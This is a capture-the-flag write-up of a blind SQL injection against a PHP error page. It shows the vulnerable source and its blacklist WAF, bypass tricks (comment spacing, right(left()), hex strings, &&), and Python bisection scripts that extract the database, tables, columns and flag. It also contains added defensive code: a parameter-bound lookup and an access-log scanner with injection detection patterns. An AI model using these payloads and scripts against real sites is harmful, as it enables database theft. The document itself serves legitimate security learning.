HGAME 2022 Final Pokemon v2 writeup
2022-08-10 22:30:00 【ek1ng】
Challenge overview
A blind SQL injection challenge: there is no direct output and the WAF blocks quite a lot. I did not solve it during the final, so I am going back over it now.
References: http://dhycnhdu.com/index.php/archives/5/ and https://blog.51cto.com/u_15400016/4287240
Bypassing the filter
The challenge ships its source, so let us start from the WAF in that source and work out how to get past it.
```php
<?php
$server = $_ENV['MYSQL_ADDR'];
$username = $_ENV['MYSQL_USER'];
$password = $_ENV['MYSQL_PASSWORD'];
$database = $_ENV['DATABASE'];
$db = new mysqli($server, $username, $password, $database);
if ($db->connect_error) {
    die('数据库链接失败！');
}
// Blacklist WAF: every entry is used as a case-insensitive regex against the raw input
function waf($code) {
    $blacklist = ['substr', 'mid', '=', 'like', '#', '\'', '"', '!','extract', 'update', '\^', '\$','union', '\bor\b', 'and', ' ', '\+', '-'];
    foreach($blacklist as $b) {
        if (preg_match('/'.$b.'/i', $code)) {
            return true;
        }
    }
    return false;
}
function getStatusMessage($code) {
    global $db;
    if (waf($code)) {
        return -1;
    }
    // $code is concatenated straight into the query: no quoting, no cast, no parameter binding
    $sql = 'SELECT code,msg FROM errors WHERE code='.$code;
    return $db->query($sql);
}
```
The code variable is concatenated directly into the SQL statement, which is what makes the injection possible.
Because union is filtered, a UNION query (which would carry the result straight back in the response) is out; only blind injection is possible. The bypasses for the individual filter entries are:
- substr -> right(left(xxx,1),1)
- space -> /**/
- = -> in() or >
- and -> %26%26 (URL-encoded &&)
- string literals (quotes are filtered) -> hex encoding
- subqueries need an extra pair of parentheses around them
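To make the two points above concrete, here is an added example that is not part of the writeup or the challenge source: the blacklist from waf() ported to Python, a lookup that concatenates the parameter the way getStatusMessage() does, and a hardened lookup that casts the input to an integer and binds it as a query parameter. It runs against a constructed in-memory SQLite table named errors (a stand-in for the challenge's MySQL table, so the MySQL-only && and sleep() payloads do not apply here, but the ORDER BY column-count probe from the page does).

```python
import re
import sqlite3

# Port of the PHP waf(): same list, every entry treated as a case-insensitive regex.
BLACKLIST = ['substr', 'mid', '=', 'like', '#', "'", '"', '!', 'extract', 'update',
             r'\^', r'\$', 'union', r'\bor\b', 'and', ' ', r'\+', '-']


def waf(code: str) -> bool:
    """True when the blacklist would reject the input (mirrors the PHP return value)."""
    return any(re.search(b, code, re.IGNORECASE) for b in BLACKLIST)


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's errors table; contents are made up."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE errors (id INTEGER PRIMARY KEY, code INTEGER, msg TEXT)")
    db.executemany("INSERT INTO errors (code, msg) VALUES (?, ?)",
                   [(404, "pokemon not found"), (500, "internal error")])
    return db


def vulnerable_lookup(db: sqlite3.Connection, code: str):
    """Same shape as getStatusMessage(): blacklist check, then plain string concatenation."""
    if waf(code):
        return -1
    try:
        return db.execute("SELECT code,msg FROM errors WHERE code=" + code).fetchall()
    except sqlite3.Error:
        # The challenge page answers "failed to query database" here; that text is the
        # oracle the writeup uses to count columns, so the same string is returned.
        return "failed to query database"


def safe_lookup(db: sqlite3.Connection, code: str):
    """Hardened form: the parameter must be an integer, and it is bound, never concatenated.
    Anything the page's bypasses could smuggle in fails the int() cast and never reaches SQL."""
    try:
        code_int = int(code)
    except ValueError:
        return None
    return db.execute("SELECT code,msg FROM errors WHERE code=?", (code_int,)).fetchall()
```

The blacklist rejects the obvious "404 and 1" but waves through the page's comment-padded ORDER BY probe, which then changes the structure of the concatenated query; the same input is simply not an integer to safe_lookup(), so the query text never changes. Allowlisting the type of the input beats enumerating the strings an attacker might use.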
Finding the injection point
First the injection point: the code parameter on the error page is injectable.
Number of columns
Use ORDER BY to determine how many columns the query returns.
/error.php?code=404/**/order/**/by/**/3
Response: failed to query database
/error.php?code=404/**/order/**/by/**/2
Response: pokemon not found
So the query returns 2 columns.
Database name length
/error.php?code=404/**/%26%26/**/if(length(database())>7,sleep(1),1)
Response: pokemon not found
/error.php?code=404/**/%26%26/**/if(length(database())>6,sleep(1),1)
Empty response
So the database name is 7 characters long.
Database name
Original payload: /error.php?code=404 and ascii(substr(database(),1,1))>112
After the WAF bypass:
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>112
Empty response
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>111
Response: pokemon not found
So the first character of the database name is p.
Injecting by hand is not practical, so next we write a Python script; doing the injection with binary search is much faster.
```python
# -*- coding: utf-8 -*-
import requests
import re

findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 8):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left(database(),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page in the response means the expression is true, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no match means the expression is false, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
```
This gives the database name: pokemon
Table names
Original payload: ?code=404 and (ascii(substr((select table_name from information_schema.tables where table_schema='pokemon' limit 0,1),1,1)))>?
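The bisection loop above leaves a very recognizable trail in the web server's access log: one client, one path, and a run of requests whose query strings are identical except for the comparison threshold. As a defender-side example added here (it is not from the writeup), the following parses constructed combined-format access log lines, flags the markers the page's payloads rely on (inline comments, %26%26, sleep(, information_schema, character-extraction functions), and clusters requests by client, path and query shape with every number masked, so the binary-search pattern surfaces as one large cluster. The log lines are constructed, and the cluster threshold of 4 is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format (nginx/apache default). The constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

# Markers taken from the payloads in the writeup, matched on the URL-decoded query string.
MARKERS = {
    "inline_comment": re.compile(r'/\*.*?\*/'),
    "encoded_and": re.compile(r'&&'),  # %26%26 once decoded
    "time_delay": re.compile(r'\bsleep\s*\(', re.I),
    "schema_probe": re.compile(r'information_schema', re.I),
    "char_extract": re.compile(r'\b(ascii|substr|right|left)\s*\(', re.I),
}


def parse_line(line):
    """Return a dict with ip, path and decoded query, or None for a line that is not in the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["url"].partition("?")
    rec["path"] = path
    rec["query"] = unquote(query)
    return rec


def markers_for(query):
    """Sorted names of the markers present in one decoded query string."""
    return sorted(name for name, rx in MARKERS.items() if rx.search(query))


def bisection_clusters(lines, min_requests=4):
    """Group requests by (ip, path, query with every integer replaced by N).
    A bisection loop issues many requests that differ only in the numeric threshold,
    so a cluster of at least min_requests (assumed value) under one masked shape is the signal."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["query"]:
            continue
        shape = re.sub(r'\d+', 'N', rec["query"])
        groups[(rec["ip"], rec["path"], shape)].append(rec["query"])
    return {key: qs for key, qs in groups.items() if len(qs) >= min_requests}


def scan(lines, min_requests=4):
    """Per-request marker hits followed by any bisection clusters, as a list of findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = markers_for(rec["query"])
        if hits:
            findings.append({"ip": rec["ip"], "path": rec["path"], "markers": hits})
    for (ip, path, shape), qs in bisection_clusters(lines, min_requests).items():
        findings.append({"ip": ip, "path": path, "markers": ["bisection"],
                         "count": len(qs), "shape": shape})
    return findings


# Constructed sample: one ordinary visitor (10.0.0.5) and one client (10.0.0.9) running
# the page's bisection loop against the first character of database().
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Aug/2022:22:10:01 +0800] "GET /error.php?code=404 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Aug/2022:22:10:02 +0800] "GET /error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>81 HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Aug/2022:22:10:02 +0800] "GET /error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>106 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Aug/2022:22:10:03 +0800] "GET /error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>118 HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Aug/2022:22:10:03 +0800] "GET /error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>112 HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Aug/2022:22:10:04 +0800] "GET /error.php?code=404/**/%26%26/**/if(length(database())>7,sleep(1),1) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The marker rules catch single requests, but they are the part an attacker can rework; the shape cluster is harder to avoid, because the bisection needs many requests that differ only in a number. In practice the cluster rule is the one worth alerting on, with the markers as supporting context.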
```python
# -*- coding: utf-8 -*-
import requests
import re

findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page in the response means the expression is true, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no match means the expression is false, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
```
This gives the table names errors,seeeeeeecret. When I dumped the columns, though, I used table_schema = 'pokemon', so the table name was not actually needed. The script also has a problem: because I never determined the length, the length of what it dumps is not certain, but usually the value itself does not end in a run of repeated characters.
Column names
Original payload: ?code=404 and (ascii(substr((select column_name from information_schema.columns where table_schema='pokemon' limit 0,1),1,1)))>?
```python
# -*- coding: utf-8 -*-
import requests
import re

findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page in the response means the expression is true, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no match means the expression is false, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
```
This gives the column names: id,code,msg,flag
Values
Original payload: ?code=404 and (ascii(substr((select flag from seeeeeeecret limit 0,1),1,1)))>?
```python
# -*- coding: utf-8 -*-
import requests
import re

findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left((select/**/flag/**/from/**/seeeeeeecret/**/limit/**/0,1),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page in the response means the expression is true, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no match means the expression is false, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
```
hgame{96mz5v3c9hnj49t7xqj76et6xw4dpczy}